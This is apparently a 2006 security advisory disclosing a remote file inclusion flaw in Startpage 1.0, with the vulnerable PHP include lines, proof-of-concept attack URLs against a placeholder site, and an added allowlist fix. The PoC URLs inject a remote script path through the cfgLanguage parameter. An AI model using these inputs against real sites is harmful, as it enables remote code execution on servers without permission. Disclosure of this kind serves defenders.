--------------------------------------------------------------------------------------------

Startpage 1.0 cfgLanguage Remote File Inclusion

--------------------------------------------------------------------------------------------

Author   : Sh3ll

Date     : 2006/08/10

HomePage : http://www.sh3ll.ir

Contact  : sh3ll[at]sh3ll[dot]ir

--------------------------------------------------------------------------------------------

Affected Software Description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Startpage

Version     : 1.0

Vendor      : http://matthijs.draijer.org

Class       : Remote File Inclusion

Risk        : High

Summary     : 

Startpage v1.0 Is a Script Which Shows Your Favorite Links.

--------------------------------------------------------------------------------------------

Vulnerability:

~~~~~~~~~~~~~

The Problem Exists in edit.php, functions.php, new.php, PageBottom.php 
& PageTop.php,

Where The Variable $cfgLanguage Is Used in an include() Function Without Being 
Declared.

----------------------------------------edit.php--------------------------------------------

...

<?php

        include ("language_$cfgLanguage.php");

        ?>

...

----------------------------------------functions.php---------------------------------------

...

<?php

        include ("config.php");

        include ("language_$cfgLanguage.php");

        ?>

...

----------------------------------------new.php---------------------------------------------

...

<?php

        include ("config.php");

        include ("functions.php");

        include ("PageTop.php");

        include ("language_$cfgLanguage.php");

        connect_db();

        ?>

...

----------------------------------------PageBottom.php--------------------------------------

...

<?php

        include ("config.php");

        include ("language_$cfgLanguage.php");

        ?>

...

----------------------------------------PageTop.php-----------------------------------------

...

<?php

        include ("config.php");

        include ("language_$cfgLanguage.php");

        ?>

...

--------------------------------------------------------------------------------------------

PoC:

~~~

http://www.target.com/[Startpage]/edit.php?=[Evil Script]

http://www.target.com/[Startpage]/functions.php?cfgLanguage=[Evil Script]

http://www.target.com/[Startpage]/new.php?cfgLanguage=[Evil Script]

http://www.target.com/[Startpage]/PageBottom.php?cfgLanguage=[Evil Script]

http://www.target.com/[Startpage]/PageTop.php?cfgLanguage=[Evil Script]


Solution:

~~~~~~~~

Sanitize The Variable $cfgLanguage in edit.php, functions.php, new.php, 
PageBottom.php & PageTop.php
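
One way to apply the fix above, given as an added example that is not part of the original advisory or of Startpage's code: $cfgLanguage is declared before use and only allowlisted values reach include(). The language codes, the default and the function name resolve_language_file() are assumptions; PHP 7 or later is assumed.

```php
<?php
// Added example, not Startpage's own code. The language codes, the default
// and the function name are assumptions chosen for illustration.

// Fixed allowlist: only these values can ever become part of an include path.
const ALLOWED_LANGUAGES = ['en', 'nl'];
const DEFAULT_LANGUAGE  = 'en';

/**
 * Map an untrusted language value to a language file in this directory.
 * Anything that is not an exact allowlist match falls back to the default,
 * so URLs, path separators, null bytes and arrays never reach include().
 */
function resolve_language_file($requested): string
{
    $lang = DEFAULT_LANGUAGE;
    if (is_string($requested) && in_array($requested, ALLOWED_LANGUAGES, true)) {
        $lang = $requested;
    }
    // Absolute path anchored to the script directory, not the include_path.
    return __DIR__ . '/language_' . $lang . '.php';
}

// In each affected script: declare the variable before use so it is never
// taken from the request, then include only the resolved file.
$cfgLanguage  = DEFAULT_LANGUAGE;            // or the value set in config.php
$languageFile = resolve_language_file($cfgLanguage);
if (is_file($languageFile)) {
    include $languageFile;
}

// Constructed sample inputs showing what the resolver returns (CLI only).
if (PHP_SAPI === 'cli') {
    $samples = ['nl', 'xx', '../config', 'http://example.invalid/x', ['nl']];
    foreach ($samples as $sample) {
        printf("%-28s -> %s\n", json_encode($sample, JSON_UNESCAPED_SLASHES),
               basename(resolve_language_file($sample)));
    }
}
```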

--------------------------------------------------------------------------------------------

Note:

~~~~

Vendor Contacted, But No Response. So Do a Dirty Patch.

--------------------------------------------------------------------------------------------

Shoutz:

~~~~~~

~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena

~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams 
